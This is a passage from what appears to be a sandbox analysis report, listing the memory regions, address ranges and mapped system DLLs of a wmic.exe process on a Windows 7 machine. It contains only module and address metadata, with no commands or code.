name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2430
start_va = 0xffa30000
end_va = 0xffabcfff
monitored = 1
entry_point = 0xffa7cc30
region_type = mapped_file
name = "wmic.exe"
filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")
Region:
id = 2431
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2432
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2433
start_va = 0x7fffffdd000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 2434
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2435
start_va = 0x170000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2436
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2437
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2438
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2439
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2440
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2441
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2442
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2443
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2444
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2445
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2446
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2447
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2448
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2449
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2450
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2451
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2452
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2453
start_va = 0x7fef4dd0000
end_va = 0x7fef4e12fff
monitored = 0
entry_point = 0x7fef4df1b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 2454
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2455
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2456
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2457
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2458
start_va = 0x7fefd660000
end_va = 0x7fefd66afff
monitored = 0
entry_point = 0x7fefd661030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 2459
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2460
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2461
start_va = 0x170000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2462
start_va = 0x240000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000240000"
filename = ""
Region:
id = 2463
start_va = 0x340000
end_va = 0x43ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000340000"
filename = ""
Region:
id = 2496
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2497
start_va = 0x440000
end_va = 0x5c7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 2498
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2499
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2500
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2501
start_va = 0x5d0000
end_va = 0x750fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 2502
start_va = 0x760000
end_va = 0x1b5ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000760000"
filename = ""
Region:
id = 2503
start_va = 0xc0000
end_va = 0xcffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmic.exe.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui")
Region:
id = 2514
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2515
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2516
start_va = 0x170000
end_va = 0x1ecfff
monitored = 0
entry_point = 0x17cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2517
start_va = 0x200000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2518
start_va = 0x170000
end_va = 0x1ecfff
monitored = 0
entry_point = 0x17cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2519
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2521
start_va = 0x1c20000
end_va = 0x1c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c20000"
filename = ""
Region:
id = 2522
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 2523
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 2524
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2525
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 2526
start_va = 0x7fef9bd0000
end_va = 0x7fef9bddfff
monitored = 0
entry_point = 0x7fef9bd5500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 2527
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 0
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 2528
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2529
start_va = 0x1ca0000
end_va = 0x1f6efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2530
start_va = 0x7fef4380000
end_va = 0x7fef4553fff
monitored = 0
entry_point = 0x7fef43b6b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 2531
start_va = 0x1f70000
end_va = 0x21affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2532
start_va = 0x1f70000
end_va = 0x20dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2533
start_va = 0x2130000
end_va = 0x21affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 2534
start_va = 0x21b0000
end_va = 0x235ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021b0000"
filename = ""
Region:
id = 2535
start_va = 0x1f70000
end_va = 0x205ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2536
start_va = 0x2060000
end_va = 0x20dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002060000"
filename = ""
Region:
id = 2537
start_va = 0x2360000
end_va = 0x257ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 2538
start_va = 0x21b0000
end_va = 0x22affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021b0000"
filename = ""
Region:
id = 2539
start_va = 0x22e0000
end_va = 0x235ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022e0000"
filename = ""
Region:
id = 2540
start_va = 0x2360000
end_va = 0x247ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 2541
start_va = 0x2500000
end_va = 0x257ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 2542
start_va = 0x1b60000
end_va = 0x1c1ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2543
start_va = 0x2580000
end_va = 0x297ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 2544
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 2545
start_va = 0x1a0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 2546
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 2547
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 2548
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2549
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2550
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2551
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 2552
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 2553
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2554
start_va = 0x1e0000
end_va = 0x1e1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2555
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2556
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2557
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2558
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 2559
start_va = 0x210000
end_va = 0x217fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 2560
start_va = 0x220000
end_va = 0x22ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 2561
start_va = 0x7fefcee0000
end_va = 0x7fefcf3afff
monitored = 0
entry_point = 0x7fefcee6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2562
start_va = 0x2980000
end_va = 0x2a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 2563
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2564
start_va = 0x2a40000
end_va = 0x2b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 2565
start_va = 0x2b40000
end_va = 0x2c1efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002b40000"
filename = ""
Region:
id = 2566
start_va = 0x21b0000
end_va = 0x222ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021b0000"
filename = ""
Region:
id = 2567
start_va = 0x2230000
end_va = 0x22affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 2568
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2569
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 2570
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2571
start_va = 0x1fe0000
end_va = 0x205ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 2572
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2573
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2574
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2575
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2576
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2577
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2578
start_va = 0x2c30000
end_va = 0x2caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c30000"
filename = ""
Region:
id = 2579
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 2580
start_va = 0x2cc0000
end_va = 0x2d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cc0000"
filename = ""
Region:
id = 2581
start_va = 0x2e90000
end_va = 0x2f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e90000"
filename = ""
Region:
id = 2582
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 2583
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 2584
start_va = 0x7fef7870000
end_va = 0x7fef7882fff
monitored = 0
entry_point = 0x7fef7877b68
region_type = mapped_file
name = "msoxmlmf.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll")
Region:
id = 2585
start_va = 0x7fef8c20000
end_va = 0x7fef8c38fff
monitored = 0
entry_point = 0x7fef8c2ee50
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")
Region:
id = 2586
start_va = 0x7fef8c10000
end_va = 0x7fef8c13fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 2587
start_va = 0x7fef8b10000
end_va = 0x7fef8c01fff
monitored = 0
entry_point = 0x7fef8b19060
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 2588
start_va = 0x7fef8b00000
end_va = 0x7fef8b02fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 2589
start_va = 0x7fef8af0000
end_va = 0x7fef8af2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 2590
start_va = 0x7fef8ae0000
end_va = 0x7fef8ae2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 2591
start_va = 0x7fef9260000
end_va = 0x7fef9262fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 2592
start_va = 0x7fef8ad0000
end_va = 0x7fef8ad2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 2593
start_va = 0x7fef8ac0000
end_va = 0x7fef8ac2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 2594
start_va = 0x7fef8ab0000
end_va = 0x7fef8ab2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 2595
start_va = 0x7fef8aa0000
end_va = 0x7fef8aa3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 2596
start_va = 0x7fef8a90000
end_va = 0x7fef8a93fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 2597
start_va = 0x7fef8a80000
end_va = 0x7fef8a83fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 2598
start_va = 0x230000
end_va = 0x230fff
monitored = 1
